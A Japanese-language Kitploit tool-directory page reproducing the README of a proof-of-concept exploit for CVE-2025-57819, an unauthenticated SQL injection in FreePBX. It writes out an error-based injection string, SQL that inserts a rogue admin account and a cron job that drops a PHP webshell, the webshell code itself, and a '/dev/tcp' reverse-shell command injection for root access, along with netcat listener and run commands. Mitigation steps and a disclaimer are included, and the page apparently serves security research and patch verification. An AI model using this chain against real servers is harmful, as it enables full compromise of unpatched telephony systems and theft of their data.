Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

フィードお問い合わせプライバシー© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
FreePBX-SQLi-RCE — CVE-2025-57819の概念実証エクスプロイト。FreePBXにおける未認証SQLインジェクションで、管理者アカウント作成、ウェブシェル展開、root権限昇格を連鎖させてRCEに至る。 | Kitploit
ツール/GitHubGitHub/thescriptkiddoz/freepbx-sqli-rce
特権昇格脆弱性分析エクスプロイトウェブアプリケーション悪用ポストエクスプロイトウェブセキュリティペネトレーションテスト論文と研究リモートアクセスツールペイロード開発
GitHubthescriptkiddoz/freepbx-sqli-rce
3ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

FreePBX-SQLi-RCE

CVE-2025-57819の概念実証エクスプロイト。FreePBXにおける未認証SQLインジェクションで、管理者アカウント作成、ウェブシェル展開、root権限昇格を連鎖させてRCEに至る。

リポジトリを見る

FreePBX CVE-2025-57819 - 未認証SQLiからRCEへのPoC

Python License

教育およびセキュリティ研究専用 - 下記の法的通知を参照してください

CVE-2025-57819のエクスプロイト実証コード(PoC)です。これはFreePBXにおける重大な未認証SQLインジェクション脆弱性で、リモートコード実行を可能にします。このPoCは、セキュリティ研究および許可されたテスト目的のみに、公式パッチがリリースされた後に公開されています。

概要

FreePBXバージョン15.x、16.x、17.x(パッチ適用済みバージョン未満)は、endpointモジュールのAJAXハンドラにおける未認証SQLインジェクションに対して脆弱です。この脆弱性チェーンにより、以下が可能になります:

  1. 管理者アカウントの作成 - SQLインジェクション経由
  2. ウェブシェルの展開 - 認証済みcronジョブインジェクション経由
  3. rootへの権限昇格(incronが利用可能な場合)- sysadmin_managerフックチェーン経由
  4. リバースシェルアクセスによる完全なシステム侵害

脆弱性の詳細

CVE IDCVE-2025-57819
種類未認証SQLインジェクション(エラーベース)
CVSS9.8 / 10.0(Critical)
影響を受けるバージョンFreePBX 15 < 15.0.66, 16 < 16.0.89, 17 < 17.0.3
パッチ適用済み15.0.66, 16.0.89, 17.0.3+
CISA KEVはい(2025年8月29日)

脆弱なエンドポイント

GET /admin/ajax.php?brand=<PAYLOAD>

endpointモジュールのAJAXハンドラにおけるbrandパラメータは、検証なしでユーザー入力を受け入れるため、エラーベースSQLインジェクションが発生します。


エクスプロイトチェーン

ステージ1: SQLインジェクションと管理者アカウントの作成

EXTRACTVALUE()エラーベース抽出を使用してSQLiを検証し、データベース名を漏洩させます:

x' AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT DATABASE()),0x7e))-- -

asterisk.ampusersに新しい管理者ユーザーを挿入します:

INSERT INTO ampusers (username, password_hash, admin) 
VALUES ('pbx_xxxxxxxx', '<MD5_HASH>', 1)

ステージ2: 認証済みCronジョブインジェクション

有効な管理者認証情報を使用して、エクスプロイトはFreePBXに認証し、認証済みセッションを確立します。セッションCookieは保存され、その後のすべての認証済みリクエストに使用されます。

asterisk.cron_jobsにウェブシェルコマンドを注入します:

INSERT INTO cron_jobs (modulename, jobname, command, class, schedule, max_runtime, enabled, execution_order)
VALUES ('sysadmin', 'wx', 'echo <BASE64_WEBSHELL>|base64 -d >/var/www/html/shell.php', NULL, '* * * * *', 30, 1, 1)

FreePBXのcronランナーがasteriskユーザーとしてコマンドを実行し、PHPウェブシェルを配置します。

ステージ3: ウェブシェルの有効化

PHPウェブシェルは/var/www/html/shell.phpに展開されます:

<?php system($_GET['cmd']); ?>

エクスプロイトはウェブシェルが有効化されるまでポーリングし、asteriskユーザー(uid=999)としてRCEを達成します。

ステージ4: 権限昇格(条件付き)

ターゲットにincronが設定されている場合:

  1. /var/spool/asterisk/incron/にトリガーファイルを作成
  2. incrond(rootとして実行中)がファイル作成を検知
  3. トリガーファイル名を引数として/usr/bin/sysadmin_managerを呼び出す
  4. sysadmin_managerがGPG署名を検証し、fwconsole-commandsフックにディスパッチ
  5. フックがペイロードをデコードして実行: /usr/sbin/fwconsole <COMMAND>
  6. コマンドインジェクション: help; bash -i >& /dev/tcp/LHOST/LPORT 0>&1

結果: リバースリスナー上でrootシェル(incronが利用可能な場合)。


悪用される仕組み

  • brandパラメータに対する入力検証の欠如
  • スタッククエリ実行によりデータベース操作が可能
  • 書き込み可能なasterisk.cron_jobsテーブルがasteriskとしてコマンドを実行
  • 作成された管理者アカウントからのCookieによる認証済みセッションの永続化
  • rootとして実行されるIncronファイルシステム監視
  • コマンドインジェクションを伴う検証されていないfwconsoleフック実行

インストール

git clone https://github.com/JazzTheRabbit/cve-2025-57819.git
cd cve-2025-57819
pip3 install requests
chmod +x JTR-CVE-2025-57819.py

使用方法

# Netcatリスナーのセットアップ
nc -lvnp <Listener Port>

# エクスプロイトの実行
python3 JTR-CVE-2025-57819.py <TARGET_IP> <YOUR_IP> <PORT>

PoC

PoC Screenshot


影響を受けるバージョン

バージョンステータス
15.0.0 - 15.0.65脆弱
15.0.66+パッチ適用済み
16.0.0 - 16.0.88脆弱
16.0.89+パッチ適用済み
17.0.0 - 17.0.2脆弱
17.0.3+パッチ適用済み

緩和策

即時対応:

  • 信頼できないネットワークからの/admin/ajax.phpへのアクセスを制限する
  • 不要な場合はincronを無効化する: systemctl disable incrond

恒久対応: パッチ適用済みバージョンにアップグレード: 15.0.66+、16.0.89+、または17.0.3+


参考資料

  • CVE-2025-57819
  • CISA KEV Catalog
  • FreePBX Security Advisory

法的通知

⚠️ 免責事項

この実証コードは、許可されたセキュリティテストおよび教育目的のみに提供されています。作者は、このツールの誤用または損害に対して一切の責任を負いません。

以下を遵守する必要があります:

  • コンピュータ詐欺および濫用法(CFAA)ならびにあなたの管轄区域における同等の法律
  • 所有している、または明示的な書面による許可を得ているシステムのみをテストすること
  • セキュリティテストの前に書面による許可を取得すること
  • 責任ある開示慣行
  • プライバシーおよびデータ保護規制(GDPR、CCPAなど)

禁止されている使用:

  • コンピュータシステムへの不正アクセス
  • 書面による同意なしのペネトレーションテスト
  • サービスの妨害またはデータ窃盗
  • 悪意のある、または違法な活動

責任の放棄: 作者は以下に対して責任を負いません:

  • 不正アクセスまたは刑事告発
  • システムへの損害またはデータ損失
  • 誤用による法的結果
  • コンピュータ詐欺法の違反

この脆弱性は:

  • 公開開示済み(CVE-2025-57819)
  • パッチが公開利用可能
  • セキュリティ研究のみを目的として公開
  • パッチリリース後に責任を持って共有

作者

JazzTheRabbit

  • GitHub: @JazzTheRabbit
  • HackTheBox: @JazzTheRabbit
  • YouTube: JazzTheRabbit

ライセンス

MIT License

ツールをダウンロード